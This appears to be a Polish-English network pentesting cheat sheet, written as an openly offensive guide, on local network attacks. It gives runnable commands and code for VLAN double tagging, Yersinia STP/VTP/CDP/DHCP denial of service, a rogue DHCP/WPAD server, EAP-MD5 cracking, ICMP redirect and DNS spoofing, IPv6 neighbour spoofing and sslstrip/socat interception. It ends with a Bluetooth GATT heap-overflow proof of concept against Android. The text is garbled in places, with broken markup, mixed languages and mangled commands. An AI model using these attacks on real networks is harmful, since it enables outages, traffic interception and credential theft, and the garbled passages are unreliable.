root@kali:~# arp-scan -I eth1.250 10.121.5.0/24

</details>
```bash
# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up

# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

Automatyczny VLAN Hopper

Opisywany atak Dynamic Trunking and creating virtual interfaces an discovering hosts inside innych VLAN-ów jest automatycznie wykonywany przez narzędzie: https://github.com/nccgroup/vlan-hopping—frogger

Double Tagging

Jeśli attacker zna wartość MAC, IP and VLAN ID of the victim host, może spróbować double tag a frame — oznaczyć ramkę zarówno VLAN-em przypisanym, jak i VLAN-em ofiary — i wysłać pakiet. Ponieważ victim won’t be able to connect back do attackera, najlepszą opcją dla attackera jest komunikacja przez UDP z protokołami, które mogą wykonać interesujące akcje (np. SNMP).

Inną opcją dla attackera jest uruchomienie TCP port scan spoofing an IP controlled by the attacker and accessible by the victim (prawdopodobnie przez internet). Następnie attacker może sniff na drugim hoście będącym w jego posiadaniu, aby sprawdzić, czy otrzymuje pakiety od victim.

Do przeprowadzenia tego ataku możesz użyć scapy: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

Lateral VLAN Segmentation Bypass

Jeśli masz access to a switch that you are directly connected to, masz możliwość bypass VLAN segmentation w sieci. Wystarczy switch the port to trunk mode (otherwise known as trunk), utworzyć interfejsy wirtualne z ID docelowych VLAN-ów i skonfigurować adres IP. Możesz spróbować uzyskać adres dynamicznie (DHCP) lub skonfigurować go statycznie — zależy od przypadku.

Lateral VLAN Segmentation Bypass

Layer 3 Private VLAN Bypass

W pewnych środowiskach, takich jak sieci bezprzewodowe dla gości, stosuje się ustawienia port isolation (also known as private VLAN), aby uniemożliwić klientom podłączonym do access pointa bezpośrednią komunikację między sobą. Jednak zidentyfikowano technikę, która może obejść te środki izolacji. Technika ta wykorzystuje albo brak sieciowych ACL, albo ich nieprawidłową konfigurację, umożliwiając trasowanie pakietów IP przez router w celu dotarcia do innego klienta w tej samej sieci.

Atak jest przeprowadzany przez stworzenie pakietu, który niesie adres IP docelowego klienta, ale z MAC routera. Powoduje to, że router błędnie przekierowuje pakiet do klienta docelowego. Podejście to jest podobne do używanego w Double Tagging Attacks, gdzie wykorzystuje się kontrolę nad hostem dostępnym dla ofiary, aby eksploatować tę lukę.

Key Steps of the Attack:

1. Crafting a Packet: Specjalnie przygotowany pakiet zawiera adres IP docelowego klienta, ale z MAC routera.
2. Exploiting Router Behavior: Przygotowany pakiet jest wysyłany do routera, który w wyniku konfiguracji przekazuje pakiet do klienta docelowego, omijając izolację zapewnianą przez private VLAN.

VTP Attacks

VTP (VLAN Trunking Protocol) centralizuje zarządzanie VLAN-ami. Wykorzystuje numery rewizji do utrzymania integralności bazy danych VLAN; każda modyfikacja inkrementuje ten numer. Przełączniki przyjmują konfiguracje z wyższymi numerami rewizji, aktualizując własne bazy danych VLAN.

VTP Domain Roles

• VTP Server: Zarządza VLAN-ami — tworzy, usuwa, modyfikuje. Broadcastuje VTP announcements do członków domeny.
• VTP Client: Odbiera VTP announcements, aby zsynchronizować swoją bazę VLAN. Ta rola uniemożliwia lokalne modyfikacje konfiguracji VLAN.
• VTP Transparent: Nie uczestniczy w aktualizacjach VTP, ale przekazuje VTP announcements. Nie jest dotknięty atakami VTP i utrzymuje stały numer rewizji równy zero.

VTP Advertisement Types

• Summary Advertisement: Broadcastowane przez VTP Server co 300 sekund, niosąc podstawowe informacje o domenie.
• Subset Advertisement: Wysyłane po zmianach konfiguracji VLAN.
• Advertisement Request: Wydawane przez VTP Clienta w celu zażądania Summary Advertisement, zwykle w odpowiedzi na wykrycie wyższego numeru rewizji konfiguracji.

Luki w VTP można wykorzystywać wyłącznie przez trunk ports, ponieważ VTP announcements krążą wyłącznie przez nie. Po ataku DTP scenariusze mogą przejść do VTP. Narzędzia takie jak Yersinia mogą ułatwić ataki VTP, mające na celu wyczyszczenie VLAN database, co skutecznie zaburza działanie sieci.

Note: This discussion pertains to VTP version 1 (VTPv1).

yersinia -G # Launch Yersinia in graphical mode

W trybie graficznym Yersinia wybierz opcję deleting all VTP vlans, aby wyczyścić VLAN database.

Ataki STP

Jeśli nie możesz przechwycić BPDU frames na swoich interfejsach, jest mało prawdopodobne, że uda ci się przeprowadzić atak STP.

STP BPDU DoS

Wysyłanie dużej liczby BPDUs TCP (Topology Change Notification) lub Conf (BPDUs wysyłanych podczas tworzenia topologii) powoduje przeciążenie przełączników i ich nieprawidłowe działanie.

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

STP TCP Attack

Gdy wysyłany jest TCP, CAM table switchy zostanie usunięta po 15s. Jeśli ciągle wysyłasz tego typu pakiety, CAM table będzie ciągle restartowana (albo co 15 sekund) i po restarcie switch zachowuje się jak hub

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

STP Root Attack

Atakujący symuluje zachowanie switcha, aby zostać STP root sieci. Wtedy przez niego przejdzie więcej ruchu. Jest to przydatne, gdy jesteś podłączony do dwóch różnych switches.
Odbywa się to poprzez wysyłanie pakietów BPDUs CONF, twierdzących, że wartość priority jest mniejsza niż rzeczywista wartość aktualnego root switcha.

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

Jeśli atakujący jest podłączony do 2 przełączników, może zostać rootem nowego drzewa i cały ruch między tymi przełącznikami przejdzie przez niego (zostanie przeprowadzony atak MITM).

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

Ataki CDP

CISCO Discovery Protocol (CDP) jest niezbędny do komunikacji między urządzeniami CISCO, umożliwiając im rozpoznawanie się nawzajem i wymianę szczegółów konfiguracji.

Pasywne zbieranie danych

CDP jest skonfigurowany do nadawania informacji przez wszystkie porty, co może prowadzić do ryzyka bezpieczeństwa. Atakujący, po podłączeniu do portu przełącznika, może uruchomić sniffery sieciowe takie jak Wireshark, tcpdump lub Yersinia. Działanie to może ujawnić wrażliwe informacje o urządzeniu sieciowym, w tym jego model oraz wersję Cisco IOS, na której działa. Następnie atakujący może celować w konkretne podatności zidentyfikowanej wersji Cisco IOS.

Wymuszenie zalewania tabeli CDP

Bardziej agresywne podejście polega na przeprowadzeniu ataku Denial of Service (DoS) poprzez przeciążenie pamięci przełącznika, podszywając się pod prawdziwe urządzenia CISCO. Poniżej znajduje się sekwencja poleceń pozwalająca zainicjować taki atak przy użyciu Yersinia, narzędzia sieciowego służącego do testów:

sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G

Podczas tego ataku CPU switcha i CDP neighbor table są mocno obciążone, co prowadzi do tego, co często określa się jako “network paralysis” z powodu nadmiernego zużycia zasobów.

CDP Impersonation Attack

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

Możesz też użyć scapy. Upewnij się, że zainstalowałeś pakiet scapy/contrib.

Ataki VoIP i narzędzie VoIP Hopper

Telefony VoIP, coraz częściej integrowane z urządzeniami IoT, oferują funkcje takie jak otwieranie drzwi czy sterowanie termostatami przez specjalne numery telefoniczne. Jednak ta integracja może stwarzać ryzyko bezpieczeństwa.

Narzędzie voiphopper zostało zaprojektowane do emulowania telefonu VoIP w różnych środowiskach (Cisco, Avaya, Nortel, Alcatel-Lucent). Odkrywa VLAN ID sieci głosowej, wykorzystując protokoły takie jak CDP, DHCP, LLDP-MED i 802.1Q ARP.

VoIP Hopper oferuje trzy tryby dla Cisco Discovery Protocol (CDP):

1. Sniff Mode (-c 0): analizuje pakiety sieciowe, aby zidentyfikować VLAN ID.
2. Spoof Mode (-c 1): generuje niestandardowe pakiety naśladujące pakiety rzeczywistego urządzenia VoIP.
3. Spoof with Pre-made Packet Mode (-c 2): wysyła pakiety identyczne z pakietami konkretnego modelu telefonu Cisco IP.

Preferowany tryb ze względu na szybkość to trzeci. Wymaga podania:

• interfejsu sieciowego atakującego (parametr -i).
• nazwy emulowanego urządzenia VoIP (parametr -E), zgodnej z formatem nazewnictwa Cisco (np. SEP, po którym następuje adres MAC).

W środowiskach korporacyjnych, aby naśladować istniejące urządzenie VoIP, można:

• sprawdzić etykietę MAC na telefonie.
• przejść do ustawień wyświetlacza telefonu, aby zobaczyć informacje o modelu.
• podłączyć urządzenie VoIP do laptopa i obserwować żądania CDP za pomocą Wireshark.

Przykładowe polecenie do uruchomienia narzędzia w trzecim trybie wyglądałoby następująco:

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

Ataki DHCP

Enumeracja

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

DoS

Two types of DoS could be performed against DHCP servers. The first one consists on simulate enough fake hosts to use all the possible IP addresses.
This attack will work only if you can see the responses of the DHCP server and complete the protocol (Discover (Comp) –> Offer (server) –> Request (Comp) –> ACK (server)). For example, this is not possible in Wifi networks.

Another way to perform a DHCP DoS is to send a DHCP-RELEASE packet using as source code every possible IP. Then, the server will think that everybody has finished using the IP.

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

Bardziej zautomatyzowany sposób na to to użycie narzędzia DHCPing

Możesz użyć wspomnianych ataków DoS, aby zmusić klientów do pobrania nowych lease’ów w środowisku i wyczerpać zasoby prawdziwych serwerów, przez co przestaną odpowiadać. Kiedy prawdziwe serwery przestaną odpowiadać i klienci spróbują ponownie się połączyć, możesz serwować złośliwe wartości opisane w następnym akapicie.

Ustaw złośliwe wartości

Fałszywy serwer DHCP można uruchomić przy użyciu skryptu DHCP znajdującego się w /usr/share/responder/DHCP.py. Jest to przydatne przy atakach sieciowych, np. przechwytywaniu ruchu HTTP i poświadczeń, przez przekierowywanie ruchu do złośliwego serwera. Ustawienie fałszywej bramy jest jednak mniej skuteczne, ponieważ pozwala jedynie na przechwytywanie ruchu wychodzącego od klienta, pomijając odpowiedzi z prawdziwej bramy. Zamiast tego zaleca się uruchomienie fałszywego serwera DNS lub WPAD, co daje skuteczniejszy atak.

Poniżej opcje konfigurowania fałszywego serwera DHCP:

• Nasz adres IP (ogłaszanie bramy): Użyj -i 10.0.0.100, aby ogłosić adres IP swojej maszyny jako bramę.
• Lokalna domena DNS: Opcjonalnie użyj -d example.org, aby ustawić lokalną domenę DNS.
• Adres IP oryginalnego routera/bramy: Użyj -r 10.0.0.1, aby określić adres IP prawdziwego routera/bramy.
• Adres IP głównego serwera DNS: Użyj -p 10.0.0.100, aby ustawić adres IP fałszywego serwera DNS, którym zarządzasz.
• Adres IP zapasowego serwera DNS: Opcjonalnie użyj -s 10.0.0.1, aby ustawić zapasowy serwer DNS.
• Maska podsieci lokalnej: Użyj -n 255.255.255.0, aby zdefiniować maskę sieci.
• Interfejs dla ruchu DHCP: Użyj -I eth1, aby nasłuchiwać ruchu DHCP na wybranym interfejsie sieciowym.
• Adres konfiguracji WPAD: Użyj -w “http://10.0.0.100/wpad.dat”, aby ustawić adres konfiguracji WPAD, co pomaga w przechwytywaniu ruchu webowego.
• Fałszowanie adresu domyślnej bramy: Dodaj -S, aby sfałszować adres IP domyślnej bramy.
• Odpowiadaj na wszystkie żądania DHCP: Dodaj -R, aby serwer odpowiadał na wszystkie żądania DHCP, ale pamiętaj, że jest to głośne i może zostać wykryte.

Dzięki prawidłowemu użyciu tych opcji można uruchomić fałszywy serwer DHCP, który skutecznie przechwyci ruch sieciowy.

# Example to start a rogue DHCP server with specified options
!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R

Ataki EAP

Here are some of the attack tactics that can be used against 802.1X implementations:

• Aktywne brute-force łamanie haseł za pomocą EAP
• Atakowanie serwera RADIUS przy użyciu nieprawidłowo sformatowanej zawartości EAP **(exploits)
• Przechwytywanie komunikatów EAP i łamanie haseł offline (EAP-MD5 i PEAP)
• Wymuszanie uwierzytelniania EAP-MD5 w celu obejścia walidacji certyfikatów TLS
• Wstrzykiwanie złośliwego ruchu sieciowego podczas uwierzytelniania przy użyciu huba lub podobnego urządzenia

If the attacker if between the victim and the authentication server, he could try to degrade (if necessary) the authentication protocol to EAP-MD5 and capture the authentication attempt. Then, he could brute-force this using:

eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt

FHRP (GLBP & HSRP) Ataki

FHRP (First Hop Redundancy Protocol) to klasa protokołów sieciowych zaprojektowana w celu utworzenia aktywnego redundantnego systemu routingu. Dzięki FHRP fizyczne routery mogą być połączone w jedno logiczne urządzenie, co zwiększa odporność na awarie i pomaga rozłożyć obciążenie.

Inżynierowie Cisco Systems opracowali dwa protokoły FHRP, GLBP i HSRP.

GLBP & HSRP Attacks

RIP

Znane są trzy wersje Routing Information Protocol (RIP): RIP, RIPv2 oraz RIPng. RIP i RIPv2 wysyłają datagramy do sąsiadów za pomocą UDP na porcie 520, natomiast RIPng rozsyła datagramy przez IPv6 multicast na UDP porcie 521. RIPv2 wprowadził wsparcie dla uwierzytelniania MD5. Z kolei RIPng nie ma natywnego uwierzytelniania — polega na opcjonalnych nagłówkach IPsec AH i ESP w IPv6.

• RIP i RIPv2: Komunikacja odbywa się za pomocą datagramów UDP na porcie 520.
• RIPng: Wykorzystuje UDP port 521 do rozsyłania datagramów przez multicast IPv6.

Zwróć uwagę, że RIPv2 obsługuje uwierzytelnianie MD5, podczas gdy RIPng nie zawiera natywnego uwierzytelniania i polega na nagłówkach IPsec AH i ESP w IPv6.

Ataki EIGRP

EIGRP (Enhanced Interior Gateway Routing Protocol) to dynamiczny protokół routingu. Jest to protokół distance-vector. Jeśli nie ma uwierzytelniania i skonfigurowanych pasywnych interfejsów, intruz może ingerować w routing EIGRP i powodować zatruwanie tablic routingu. Ponadto sieć EIGRP (czyli system autonomiczny) jest płaska i nie ma segmentacji na żadne strefy. Jeśli atakujący wstrzyknie trasę, jest bardzo prawdopodobne, że trasa ta rozprzestrzeni się po całym autonomicznym systemie EIGRP.

Aby zaatakować system EIGRP trzeba nawiązać sąsiedztwo z legalnym routerem EIGRP, co otwiera wiele możliwości, od podstawowego rozpoznania po różne wstrzyknięcia.

FRRouting pozwala zaimplementować wirtualny router obsługujący BGP, OSPF, EIGRP, RIP i inne protokoły. Wystarczy wdrożyć go na systemie atakującego i można podszyć się pod legalny router w domenie routingu.

EIGRP Attacks

Coly ma możliwości przechwytywania rozgłoszeń EIGRP (Enhanced Interior Gateway Routing Protocol). Umożliwia też wstrzykiwanie pakietów, co można wykorzystać do zmiany konfiguracji routingu.

OSPF

W protokole Open Shortest Path First (OSPF) powszechnie stosuje się uwierzytelnianie MD5, aby zapewnić bezpieczną komunikację między routerami. Jednak ten mechanizm można złamać za pomocą narzędzi takich jak Loki i John the Ripper. Narzędzia te potrafią przechwycić i złamać hashe MD5, ujawniając klucz uwierzytelniający. Po uzyskaniu tego klucza można go użyć do wprowadzenia nowych informacji routingu. Parametry trasy konfiguruje się na karcie Injection, a skompromitowany klucz ustawia na karcie Connection.

Inne ogólne narzędzia i źródła

• Above: Narzędzie do skanowania ruchu sieciowego i wykrywania podatności
• Możesz znaleźć więcej informacji o atakach na sieć tutaj.

Spoofing

Atakujący konfiguruje wszystkie parametry sieci (GW, IP, DNS) nowego członka sieci, wysyłając fałszywe odpowiedzi DHCP.

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

ARP Spoofing

Check the previous section.

ICMPRedirect

ICMP Redirect polega na wysyłaniu ICMP packet type 1 code 5, który wskazuje, że attacker jest najlepszą drogą dotarcia do danego IP. Gdy victim będzie chciał skontaktować się z tym IP, wyśle packet przez attacker.

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

DNS Spoofing

Atakujący rozwiąże niektóre (lub wszystkie) domeny, o które prosi ofiara.

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

Skonfiguruj własny DNS za pomocą dnsmasq

apt-get install dnsmasq
echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf
echo "127.0.0.1   domain.example.com" > dnsmasq.hosts
sudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

Lokalne bramy

Często istnieje wiele tras do systemów i sieci. Po zbudowaniu listy adresów MAC w sieci lokalnej użyj gateway-finder.py, aby zidentyfikować hosty, które obsługują przekazywanie IPv4.

</details>


### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

W przypadku lokalnego rozwiązywania nazw hostów, gdy zapytania DNS nie powiodą się, systemy Microsoft korzystają z **Link-Local Multicast Name Resolution (LLMNR)** oraz **NetBIOS Name Service (NBT-NS)**. Podobnie implementacje **Apple Bonjour** i **Linux zero-configuration** używają **Multicast DNS (mDNS)** do wykrywania urządzeń w sieci. Ze względu na brak uwierzytelniania tych protokołów oraz ich działanie przez UDP z użyciem rozgłaszania, mogą być one wykorzystywane przez atakujących do przekierowywania użytkowników do złośliwych usług.

Możesz podszyć się pod usługi wyszukiwane przez hosty, używając Responder do wysyłania fałszywych odpowiedzi.\
Przeczytaj tu więcej informacji o [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).

### [Spoofing WPAD](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

Przeglądarki często korzystają z protokołu **Web Proxy Auto-Discovery (WPAD)**, aby automatycznie pobrać ustawienia proxy. Polega to na pobieraniu konfiguracji z serwera, zwykle z URL-a takiego jak "http://wpad.example.org/wpad.dat". Odkrycie takiego serwera przez klienty może następować różnymi mechanizmami:

- Przez **DHCP**, gdzie odkrycie ułatwia użycie specjalnego wpisu o kodzie 252.
- Przez **DNS**, co polega na wyszukiwaniu nazwy hosta oznaczonej jako _wpad_ w domenie lokalnej.
- Przez **Microsoft LLMNR i NBT-NS**, które są mechanizmami zapasowymi używanymi, gdy zapytania DNS nie powiodą się.

Narzędzie Responder wykorzystuje ten protokół, działając jako złośliwy serwer WPAD. Używa DHCP, DNS, LLMNR i NBT-NS, aby wprowadzić klientów w błąd i skłonić ich do połączenia. Aby zgłębić, jak usługi mogą być podszywane przy użyciu Responder [check this](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).

### [Spoofing SSDP and UPnP devices](spoofing-ssdp-and-upnp-devices.md)

Możesz zaoferować różne usługi w sieci, aby skłonić użytkownika do podania **poświadczeń w postaci jawnego tekstu**. **Więcej informacji o tym ataku w** [**Spoofing SSDP and UPnP Devices**](spoofing-ssdp-and-upnp-devices.md)**.**

IPv6 Neighbor Spoofing

This attack is very similar to ARP Spoofing but in the IPv6 world. You can get the victim think that the IPv6 of the GW has the MAC of the attacker.
```bash
sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

</details>


### Notatki o aktywnym wykrywaniu

Należy pamiętać, że gdy pakiet UDP zostanie wysłany do urządzenia, które nie ma żądanego portu, zostanie wysłany komunikat ICMP (Port Unreachable).

### **ARP — odkrywanie**

Pakiety ARP służą do wykrywania, które adresy IP są używane w sieci. PC musi wysłać żądanie dla każdego możliwego adresu IP i odpowiadają tylko te, które są używane.

### **mDNS (multicast DNS)**

Bettercap wysyła zapytanie MDNS (co X ms) dotyczące **\_services\_.dns-sd.\_udp.local**. Maszyna, która otrzyma ten pakiet, zwykle odpowiada na to zapytanie. Następnie wyszukuje tylko maszyny odpowiadające na "services".

**Narzędzia**

- Avahi-browser (--all)
- Bettercap (net.probe.mdns)
- Responder

### **NBNS (NetBios Name Server)**

Bettercap rozsyła pakiety na port 137/UDP, pytając o nazwę "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".

### **SSDP (Simple Service Discovery Protocol)**

Bettercap rozsyła pakiety SSDP, wyszukując wszelkiego rodzaju usługi (UDP port 1900).

### **WSD (Web Service Discovery)**

Bettercap rozsyła pakiety WSD, wyszukując usługi (UDP port 3702).


## Ataki Bluetooth (L2CAP/ATT/GATT)

- Android Fluoride udostępnia usługi poprzez L2CAP PSMs (np. SDP 0x0001, RFCOMM 0x0003, BNEP 0x000F, AVCTP 0x0017/0x001B, AVDTP 0x0019, ATT/GATT 0x001F). Usługi rejestrują się poprzez:
```c
uint16_t L2CA_Register2(uint16_t psm, const tL2CAP_APPL_INFO& p_cb_info,
bool enable_snoop, tL2CAP_ERTM_INFO* p_ertm_info,
uint16_t my_mtu, uint16_t required_remote_mtu,
uint16_t sec_level);

acl  = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks')
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672)
gatt.send_frag(p8(GATT_READ)+p16(1234))
print(gatt.recv())

# GATT_REQ_READ_MULTI_VAR (0x20), MTU=55
acl  = ACLConnection(interface, bdaddr)
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=55)
pkt  = b'\x20'  # opcode
pkt += p16(9); pkt += p16(9); pkt += p16(9); pkt += p16(9)
gatt.send(pkt)
# On 4th insert: p_buf->len=55 (1 + 3*(16+2)), total_len=73 -> len=16-(73-55)=-2 -> ~64KB overwrite